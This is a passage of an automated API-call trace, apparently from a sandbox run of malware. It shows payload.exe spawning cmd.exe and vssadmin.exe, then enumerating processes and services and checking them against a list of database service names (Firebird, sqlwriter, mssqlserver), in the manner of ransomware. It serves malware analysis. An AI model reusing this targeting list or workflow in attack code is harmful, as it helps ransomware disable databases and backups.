hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0045.061] lstrlenW (lpString="over-celebrity.exe") returned 18 [0045.061] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0045.062] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0045.062] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0045.062] lstrlenW (lpString="payload.exe") returned 11 [0045.062] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0045.063] lstrlenW (lpString="cmd.exe") returned 7 [0045.063] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0045.064] lstrlenW (lpString="conhost.exe") returned 11 [0045.064] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0045.064] lstrlenW (lpString="vssadmin.exe") returned 12 [0045.064] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0045.065] lstrlenW (lpString="VSSVC.exe") returned 9 [0045.065] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.066] lstrlenW (lpString="svchost.exe") returned 11 [0045.066] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0045.066] CloseHandle (hObject=0x1b8) returned 1 [0045.066] Sleep (dwMilliseconds=0x1f4) [0045.769] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x626e60 [0045.770] EnumServicesStatusExW (in: hSCManager=0x626e60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0045.770] GetLastError () returned 0xea [0045.770] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12c6) returned 0x3ff70c0 [0045.770] EnumServicesStatusExW (in: hSCManager=0x626e60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3ff70c0, cbBufSize=0x12c6, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3ff70c0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0045.771] CloseServiceHandle (hSCObject=0x626e60) returned 1 [0045.771] lstrlenW (lpString="Appinfo") returned 7 [0045.771] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0045.771] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0045.771] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0045.771] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0045.771] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0045.771] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0045.771] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0045.771] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0045.771] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0045.771] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0045.771] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0045.771] lstrlenW (lpString="AudioSrv") returned 8 [0045.771] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0045.771] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0045.771] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0045.771] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0045.771] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0045.771] lstrlenW (lpString="BFE") returned 3 [0045.771] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0045.771] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0045.771] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0045.771] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0045.771] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0045.772] lstrlenW (lpString="CryptSvc") returned 8 [0045.772] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0045.772] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0045.772] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0045.772] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0045.772] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0045.772] lstrlenW (lpString="CscService") returned 10 [0045.772] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0045.772] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0045.772] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0045.772] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0045.772] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0045.772] lstrlenW (lpString="DcomLaunch") returned 10 [0045.772] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0045.772] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0045.772] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0045.772] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0045.772] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0045.772] lstrlenW (lpString="Dhcp") returned 4 [0045.772] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0045.772] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0045.772] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0045.772] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0045.772] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0045.772] lstrlenW (lpString="Dnscache") returned 8 [0045.772] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0045.772] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0045.772] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0045.772] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0045.772] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0045.772] lstrlenW (lpString="DPS") returned 3 [0045.772] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0045.772] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0045.772] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0045.772] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0045.772] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0045.773] lstrlenW (lpString="eventlog") returned 8 [0045.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0045.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0045.773] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0045.773] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0045.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0045.773] lstrlenW (lpString="EventSystem") returned 11 [0045.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0045.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0045.773] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0045.773] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0045.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0045.773] lstrlenW (lpString="gpsvc") returned 5 [0045.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0045.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0045.773] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0045.773] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0045.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0045.773] lstrlenW (lpString="iphlpsvc") returned 8 [0045.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0045.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0045.773] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0045.773] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0045.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0045.773] lstrlenW (lpString="LanmanServer") returned 12 [0045.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0045.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0045.773] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0045.773] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0045.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0045.773] lstrlenW (lpString="LanmanWorkstation") returned 17 [0045.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0045.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0045.773] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0045.773] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0045.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0045.774] lstrlenW (lpString="lmhosts") returned 7 [0045.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0045.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0045.774] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0045.774] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0045.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0045.774] lstrlenW (lpString="MMCSS") returned 5 [0045.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0045.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0045.774] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0045.774] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0045.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0045.774] lstrlenW (lpString="MpsSvc") returned 6 [0045.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0045.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0045.774] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0045.774] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0045.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0045.774] lstrlenW (lpString="Netman") returned 6 [0045.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0045.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0045.774] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0045.774] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0045.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0045.774] lstrlenW (lpString="netprofm") returned 8 [0045.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0045.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0045.774] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0045.774] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0045.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0045.774] lstrlenW (lpString="NlaSvc") returned 6 [0045.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0045.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0045.774] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0045.775] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0045.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0045.775] lstrlenW (lpString="nsi") returned 3 [0045.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0045.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0045.775] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0045.775] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0045.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0045.775] lstrlenW (lpString="PcaSvc") returned 6 [0045.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0045.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0045.775] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0045.775] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0045.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0045.775] lstrlenW (lpString="PlugPlay") returned 8 [0045.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0045.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0045.775] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0045.775] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0045.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0045.775] lstrlenW (lpString="Power") returned 5 [0045.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0045.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0045.775] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0045.775] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0045.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0045.775] lstrlenW (lpString="ProfSvc") returned 7 [0045.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0045.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0045.775] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0045.775] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0045.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0045.775] lstrlenW (lpString="RpcEptMapper") returned 12 [0045.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0045.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0045.776] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0045.776] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0045.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0045.776] lstrlenW (lpString="RpcSs") returned 5 [0045.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0045.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0045.776] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0045.776] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0045.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0045.776] lstrlenW (lpString="SamSs") returned 5 [0045.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0045.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0045.776] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0045.776] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0045.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0045.776] lstrlenW (lpString="Schedule") returned 8 [0045.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0045.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0045.776] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0045.776] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0045.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0045.776] lstrlenW (lpString="SENS") returned 4 [0045.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0045.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0045.776] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0045.776] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0045.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0045.776] lstrlenW (lpString="ShellHWDetection") returned 16 [0045.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0045.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0045.776] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0045.776] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0045.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0045.776] lstrlenW (lpString="Spooler") returned 7 [0045.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0045.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0045.777] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0045.777] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0045.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0045.777] lstrlenW (lpString="swprv") returned 5 [0045.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0045.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0045.777] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0045.777] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0045.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0045.777] lstrlenW (lpString="SysMain") returned 7 [0045.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0045.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0045.777] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0045.777] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0045.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0045.777] lstrlenW (lpString="Themes") returned 6 [0045.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0045.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0045.777] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0045.777] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0045.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0045.777] lstrlenW (lpString="TrkWks") returned 6 [0045.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0045.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0045.777] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0045.777] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0045.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0045.777] lstrlenW (lpString="UxSms") returned 5 [0045.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0045.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0045.777] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0045.777] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0045.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0045.777] lstrlenW (lpString="VSS") returned 3 [0045.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0045.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0045.778] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0045.778] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0045.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0045.778] lstrlenW (lpString="WdiServiceHost") returned 14 [0045.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0045.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0045.778] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0045.778] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0045.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0045.778] lstrlenW (lpString="WdiSystemHost") returned 13 [0045.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0045.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0045.778] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0045.778] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0045.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0045.778] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0045.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0045.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0045.778] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0045.778] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0045.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0045.778] lstrlenW (lpString="Winmgmt") returned 7 [0045.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0045.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0045.778] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0045.778] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0045.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0045.778] lstrlenW (lpString="WPDBusEnum") returned 10 [0045.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0045.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0045.778] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0045.778] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0045.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0045.778] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3ff70c0 | out: hHeap=0x5d0000) returned 1 [0045.779] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x200 [0045.781] Process32FirstW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0045.781] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0045.782] lstrlenW (lpString="System") returned 6 [0045.782] lstrcmpiW 